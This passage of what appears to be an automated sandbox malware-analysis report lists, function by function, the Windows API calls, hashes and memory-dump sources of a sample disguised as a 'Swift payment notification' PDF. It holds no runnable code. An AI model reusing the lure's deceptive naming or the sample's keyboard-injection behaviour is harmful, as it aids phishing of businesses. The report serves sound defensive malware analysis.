                                                                                                                              • Opcode Fuzzy Hash: 121c2e71a63d83f202090fb515f4f119a3fa74be0ae2761aea1c77af5e92b77f
                                                                                                                              • Instruction Fuzzy Hash: C151AD7294010AEFDF119FA4CCC18EF7BB6EB88354B24452BF925A2250D778CCA1DB58
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?), ref: 0044C570
                                                                                                                              • SetKeyboardState.USER32(00000080), ref: 0044C594
                                                                                                                              • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                                                                                                              • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                                                                                                              • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                                                                                                              • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost$KeyboardState$InputSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2221674350-0
                                                                                                                              • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                              • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                                                                                                              • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                                                                                                              • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
                                                                                                                              APIs
                                                                                                                              • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                              • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                                                                              • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                                                                              • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$Copy$AllocClearErrorLastString
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 960795272-0
                                                                                                                              • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                              • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                                                                                                              • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                                                                                                              • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                                                                                                              APIs
                                                                                                                              • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                              • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                              • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4189319755-0
                                                                                                                              • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                              • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                                                                                                              • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                                                                                                              • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                                                                                                              • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                                                                                                              • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$LongWindow$InvalidateRect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1976402638-0
                                                                                                                              • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                              • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                                                                                                              • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                                                                                                              • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                                                                                                              APIs
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00440B18
                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00440B50
                                                                                                                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 642888154-0
                                                                                                                              • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                              • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                                                                                                              • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                                                                                                              • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                                                                                                              APIs
                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3368777196-0
                                                                                                                              • Opcode ID: 6b86fba21298b01c4250932be7ae2c60a60554d85aa1f9be0ba9eecc514e870e
                                                                                                                              • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                                              • Opcode Fuzzy Hash: 6b86fba21298b01c4250932be7ae2c60a60554d85aa1f9be0ba9eecc514e870e
                                                                                                                              • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$Copy$ClearErrorLast
                                                                                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                              • API String ID: 2487901850-572801152
                                                                                                                              • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                              • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                                                                                                              • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                                                                                                              • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Enable$Show$MessageSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1871949834-0
                                                                                                                              • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                              • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                                                                                                              • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                                                                                                              • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                              • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                                                                                                              • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                                                                                                              • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                                                                                                              APIs
                                                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                                                                                                              • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                                                                                                              • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                                                                                                              • SendMessageW.USER32 ref: 00471AE3
                                                                                                                              • DestroyIcon.USER32(?), ref: 00471AF4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3611059338-0
                                                                                                                              • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                              • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                                                                                                              • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                                                                                                              • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DestroyWindow$DeleteObject$IconMove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1640429340-0
                                                                                                                              • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                              • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                                                                                                              • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                                                                                                              • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 752480666-0
                                                                                                                              • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                              • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                                                                                                              • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                                                                                                              • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3275902921-0
                                                                                                                              • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                              • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                                                                                                              • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                                                                                                              • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3275902921-0
